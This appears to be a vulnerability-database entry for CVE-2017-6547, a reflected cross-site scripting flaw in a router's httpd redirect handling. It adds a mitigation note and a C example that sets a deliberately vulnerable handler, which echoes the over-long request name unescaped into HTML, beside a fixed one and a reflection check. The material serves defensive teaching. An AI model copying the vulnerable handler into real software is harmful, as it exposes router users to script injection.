Vendor: httpd
By: N/A
CVSS: 6.1 (MEDIUM)
Type: XSS
CWE: 79
Product Name: httpd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CVE: CVE-2017-6547
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017
Cross-Site Scripting (XSS)
In the function handle_request, httpd checks whether the requested file name is longer than 50 characters. If it is, httpd responds with a redirection, which allows an attacker to inject arbitrary JavaScript code into the context of the router's web interface.
Mitigation:
Ensure that the length of the requested file name is properly validated and that the response does not contain any user-supplied data.
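The pattern described above next to the mitigated form, as an added example that is not code from httpd or from the advisory. The function names, the response layout, the fixed redirect target `/` and the sample request name are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_NAME 50   /* length threshold named in the advisory */

/* "Before" pattern (constructed, hypothetical response layout): the
 * over-long request name is copied into the redirect page unescaped. */
int redirect_reflecting(const char *file, char *out, size_t cap)
{
    if (strlen(file) <= MAX_NAME)
        return 0;                       /* normal file handling, not shown */
    snprintf(out, cap,
             "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
             "<meta http-equiv=\"refresh\" content=\"0; url=/%s\">", file);
    return 1;
}

/* Mitigated pattern: same length check, but the redirect is a constant
 * string, so no byte of the request can reach the response. */
int redirect_fixed(const char *file, char *out, size_t cap)
{
    if (strlen(file) <= MAX_NAME)
        return 0;
    snprintf(out, cap, "%s",
             "HTTP/1.0 302 Found\r\nLocation: /\r\nContent-Length: 0\r\n\r\n");
    return 1;
}

/* Regression check: does the response echo the requested name? */
int reflects(const char *resp, const char *file)
{
    return strstr(resp, file) != NULL;
}

int main(void)
{
    /* Constructed sample: 50 filler bytes plus a harmless markup marker. */
    const char *name = "AAAAAAAAAAAAAAAAAAAAAAAAA"
                       "AAAAAAAAAAAAAAAAAAAAAAAAA<marker>";
    char out[512];

    redirect_reflecting(name, out, sizeof out);
    printf("reflecting handler echoes request: %d\n", reflects(out, name));
    redirect_fixed(name, out, sizeof out);
    printf("fixed handler echoes request:      %d\n", reflects(out, name));
    return 0;
}
```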